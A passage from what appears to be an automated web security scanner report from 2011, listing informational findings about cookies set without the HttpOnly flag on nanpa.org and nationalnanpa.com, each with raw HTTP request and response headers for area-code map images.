ETag: "9c18d6e3de016bac59085e3c74723530"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Thu, 12 May 2011 00:49:03 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.04405
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef11477ab40b6
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 48c6b00eb172eca08292fefc3f9a44aa803a0bea
X-RateLimit-Reset: 1305164927
Set-Cookie: k=173.193.214.243.1305161343071359; path=/; expires=Thu, 19-May-11 00:49:03 GMT; domain=.twitter.com
Set-Cookie: original_referer=ZLhHHTiegr8kpyX5k%2BwrH7KWx%2F5%2BVN6GIeAi2OckkTU%3D; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCMagreEvAToHaWQiJTFlNzc0MGNjZDE5YWRh%250ANmViZDk3ZWZmMTgxMzUwYjRiIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--9e2ecb2bd74b01132ec8ea6647ea1b3428d0ca0f; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Connection: close
Content-Length: 6953

twitterCallback2([{"text":"RT @pcapr Visualizing application flows: http:\/\/bit.ly\/kSappw","coordinates":null,"truncated":false,"id_str":"64004740723392512","source":"\u003Ca href=\"http:\/\/seesmic
...[SNIP]...

13.37. http://www.nanpa.org/forums/external.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nanpa.org
Path:   /forums/external.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forums/external.php?type=js HTTP/1.1
Host: www.nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/recent_forum_posts.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:03:56 GMT
Server: Apache
Set-Cookie: vblastvisit=1305158636; expires=Fri, 11-May-2012 00:03:56 GMT; path=/
Set-Cookie: vblastactivity=0; expires=Fri, 11-May-2012 00:03:56 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Length: 1293
Content-Type: text/html; charset=ISO-8859-1


   function thread(threadid, title, poster, threaddate, threadtime)
   {
       this.threadid = threadid;
       this.title = title;
       this.poster = poster;
       this.threaddate = threaddate;
       this.threadtime = thre
...[SNIP]...

13.38. http://www.nationalnanpa.com/area_code_maps/usmaps/ak.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/ak.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/ak.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:54 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:05 GMT
ETag: "2872e-29b4-471ab6b933b40"
Accept-Ranges: bytes
Content-Length: 10676
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89a............3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f..............3..f..............3..f.........3..3.33.f3..3..3..33.33333f33.33.33.3f.3f33ff3f.3f.3f.3..3.33.f3..3..3..3..3.33
...[SNIP]...

13.39. http://www.nationalnanpa.com/area_code_maps/usmaps/al.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/al.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/al.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:54 GMT
Server: Apache
Last-Modified: Wed, 23 Jun 2010 18:17:36 GMT
ETag: "2873c-4a7d-489b68d637000"
Accept-Ranges: bytes
Content-Length: 19069
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89a..................l0,+........w.....P.[8.............................m...vst................wC......XE7..................................................S.......jB...........T........m..........
...[SNIP]...

13.40. http://www.nationalnanpa.com/area_code_maps/usmaps/ar.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/ar.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/ar.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:54 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:05 GMT
ETag: "a81c1-2351-471ab6b933b40"
Accept-Ranges: bytes
Content-Length: 9041
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a............3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f..............3..f..............3..f.........3..3.33.f3..3..3..33.33333f33.33.33.3f.3f33ff3f.3f.3f.3..3.33.f3..3..3..3..3.33
...[SNIP]...

13.41. http://www.nationalnanpa.com/area_code_maps/usmaps/az.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/az.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/az.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:54 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:06 GMT
ETag: "28743-20c2-471ab6ba27d80"
Accept-Ranges: bytes
Content-Length: 8386
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89a............3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f..............3..f..............3..f.........3..3.33.f3..3..3..33.33333f33.33.33.3f.3f33ff3f.3f.3f.3..3.33.f3..3..3..3..3.33
...[SNIP]...

13.42. http://www.nationalnanpa.com/area_code_maps/usmaps/ca.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/ca.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/ca.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:56 GMT
Server: Apache
Last-Modified: Fri, 13 Nov 2009 19:55:04 GMT
ETag: "a81de-adbd-47846092f9600"
Accept-Ranges: bytes
Content-Length: 44477
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a...............u..v.....f...............Tm.......j..........................EE:..
................lW...fgX...]]]vxf............r...............n.1P.++)....................m........[............U
...[SNIP]...

13.43. http://www.nationalnanpa.com/area_code_maps/usmaps/co.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/co.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/co.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:56 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:07 GMT
ETag: "28727-208f-471ab6bb1bfc0"
Accept-Ranges: bytes
Content-Length: 8335
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89a............3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f..............3..f..............3..f.........3..3.33.f3..3..3..33.33333f33.33.33.3f.3f33ff3f.3f.3f.3..3.33.f3..3..3..3..3.33
...[SNIP]...

13.44. http://www.nationalnanpa.com/area_code_maps/usmaps/ct.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/ct.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/ct.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:56 GMT
Server: Apache
Last-Modified: Mon, 07 Dec 2009 19:47:45 GMT
ETag: "a81c6-6275-47a28bb35fa40"
Accept-Ranges: bytes
Content-Length: 25205
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a . ...........a..e"........{..N.......n-.....e...............z|j....?E...=>5.....C..................w8.....U..................[]O..Y..p-.'......kl].......m.........wLMB................}H....o0.
...[SNIP]...

13.45. http://www.nationalnanpa.com/area_code_maps/usmaps/dc.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/dc.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/dc.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:57 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:07 GMT
ETag: "2871a-182b-471ab6bb1bfc0"
Accept-Ranges: bytes
Content-Length: 6187
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89a............3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f..............3..f..............3..f.........3..3.33.f3..3..3..33.33333f33.33.33.3f.3f33ff3f.3f.3f.3..3.33.f3..3..3..3..3.33
...[SNIP]...

13.46. http://www.nationalnanpa.com/area_code_maps/usmaps/de.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/de.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/de.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:57 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:07 GMT
ETag: "a81c5-3284-471ab6bb1bfc0"
Accept-Ranges: bytes
Content-Length: 12932
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a............3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f..............3..f..............3..f.........3..3.33.f3..3..3..33.33333f33.33.33.3f.3f33ff3f.3f.3f.3..3.33.f3..3..3..3..3.33
...[SNIP]...

13.47. http://www.nationalnanpa.com/area_code_maps/usmaps/fl.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/fl.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/fl.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:57 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:07 GMT
ETag: "a81e9-345f-471ab6bb1bfc0"
Accept-Ranges: bytes
Content-Length: 13407
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a............3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f..............3..f..............3..f.........3..3.33.f3..3..3..33.33333f33.33.33.3f.3f33ff3f.3f.3f.3..3.33.f3..3..3..3..3.33
...[SNIP]...

13.48. http://www.nationalnanpa.com/area_code_maps/usmaps/ga.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/ga.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/ga.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:57 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:07 GMT
ETag: "a81d1-baf4-471ab6bb1bfc0"
Accept-Ranges: bytes
Content-Length: 47860
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a.........C...LL4.......KR......ST......e......................(....oo........jq...11....33&.....gppn..t...............SSB..t........|.
..[....z.................hFdeE....W:.......5!..l..........
...[SNIP]...

13.49. http://www.nationalnanpa.com/area_code_maps/usmaps/hi.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/hi.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/hi.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:58 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:07 GMT
ETag: "28728-20cb-471ab6bb1bfc0"
Accept-Ranges: bytes
Content-Length: 8395
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89a............3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f..............3..f..............3..f.........3..3.33.f3..3..3..33.33333f33.33.33.3f.3f33ff3f.3f.3f.3..3.33.f3..3..3..3..3.33
...[SNIP]...

13.50. http://www.nationalnanpa.com/area_code_maps/usmaps/ia.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/ia.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/ia.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:58 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:07 GMT
ETag: "a81f5-2624-471ab6bb1bfc0"
Accept-Ranges: bytes
Content-Length: 9764
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a............3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f..............3..f..............3..f.........3..3.33.f3..3..3..33.33333f33.33.33.3f.3f33ff3f.3f.3f.3..3.33.f3..3..3..3..3.33
...[SNIP]...

13.51. http://www.nationalnanpa.com/area_code_maps/usmaps/id.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/id.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/id.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:58 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:07 GMT
ETag: "a81d6-1bb1-471ab6bb1bfc0"
Accept-Ranges: bytes
Content-Length: 7089
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a............3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f..............3..f..............3..f.........3..3.33.f3..3..3..33.33333f33.33.33.3f.3f33ff3f.3f.3f.3..3.33.f3..3..3..3..3.33
...[SNIP]...

13.52. http://www.nationalnanpa.com/area_code_maps/usmaps/il.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/il.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/il.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:58 GMT
Server: Apache
Last-Modified: Fri, 06 Nov 2009 19:09:21 GMT
ETag: "a81d5-7594-477b894cd1a40"
Accept-Ranges: bytes
Content-Length: 30100
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a . ....8$...`...L6'..W[8%.......a..e"..{..Nz|j...=>5.......Y....n-.........-.'......[]O..e.......w8..w..Ckl].......?ELMB...........p........Y@@@.o0....ot....................L..........x>@..```
...[SNIP]...

13.53. http://www.nationalnanpa.com/area_code_maps/usmaps/in.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/in.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/in.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:59 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:07 GMT
ETag: "a81f7-26ad-471ab6bb1bfc0"
Accept-Ranges: bytes
Content-Length: 9901
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a............3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f..............3..f..............3..f.........3..3.33.f3..3..3..33.33333f33.33.33.3f.3f33ff3f.3f.3f.3..3.33.f3..3..3..3..3.33
...[SNIP]...

13.54. http://www.nationalnanpa.com/area_code_maps/usmaps/ks.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/ks.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/ks.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:59 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:08 GMT
ETag: "28732-1f54-471ab6bc10200"
Accept-Ranges: bytes
Content-Length: 8020
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89a............3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f..............3..f..............3..f.........3..3.33.f3..3..3..33.33333f33.33.33.3f.3f33ff3f.3f.3f.3..3.33.f3..3..3..3..3.33
...[SNIP]...

13.55. http://www.nationalnanpa.com/area_code_maps/usmaps/ky.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/ky.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/ky.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:59 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:08 GMT
ETag: "28736-200b-471ab6bc10200"
Accept-Ranges: bytes
Content-Length: 8203
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89a............3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f..............3..f..............3..f.........3..3.33.f3..3..3..33.33333f33.33.33.3f.3f33ff3f.3f.3f.3..3.33.f3..3..3..3..3.33
...[SNIP]...

13.56. http://www.nationalnanpa.com/area_code_maps/usmaps/la.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/la.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/la.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:59 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:08 GMT
ETag: "a81f3-2aa4-471ab6bc10200"
Accept-Ranges: bytes
Content-Length: 10916
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a............3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f..............3..f..............3..f.........3..3.33.f3..3..3..33.33333f33.33.33.3f.3f33ff3f.3f.3f.3..3.33.f3..3..3..3..3.33
...[SNIP]...

13.57. http://www.nationalnanpa.com/area_code_maps/usmaps/ma.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/ma.gif

Issue detail

